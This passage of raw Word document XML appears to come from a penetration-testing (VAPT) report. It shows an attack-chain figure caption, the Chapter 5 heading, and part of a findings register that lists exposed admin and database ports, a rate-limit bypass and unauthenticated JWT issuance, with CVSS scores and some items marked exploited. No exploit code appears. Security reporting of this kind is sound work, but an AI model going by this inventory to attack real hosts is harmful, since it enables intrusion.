            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig422_attack_chains.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2503926"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.22: Attack chain diagram — four confirmed attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 5: RESULTS, ANALYSIS AND REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This chapter presents the complete set of findings from the VAPT engagement, their risk ratings, the attack chains they enable, and the specific remediation steps recommended for each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.1 Complete Findings Register</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL Port 3306 Exposed to Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Critical**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.8</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N-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MikroTik Admin Panel Exposed (Port 9001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Critical**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.1</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N-013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cPanel Admin Panel Exposed (Port 2083)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Critical**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.8</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N-014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM Root Panel Exposed (Port 2087)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Critical**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>10.0</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N-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SSH Port 22 Publicly Accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.2</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N-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shared Hosting Lateral Movement Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.5</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N-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rate Limit Bypass via X-Forwarded-For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Exploited**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Webmail Interface Exposed (Port 2096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.5</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N-018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Additional cPanel Interfaces Exposed (2078, 2091)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.5</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N-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>API Routes Exposed in Client-Side JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.3</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N-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Unauthenticated JWT Token Issuance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Confirmed + **Exploited**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SSL Certificate Mismatch (Backend Server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.9</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N-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CSP Allows unsafe-inline Scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.4</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N-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Wildcard DNS Configured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
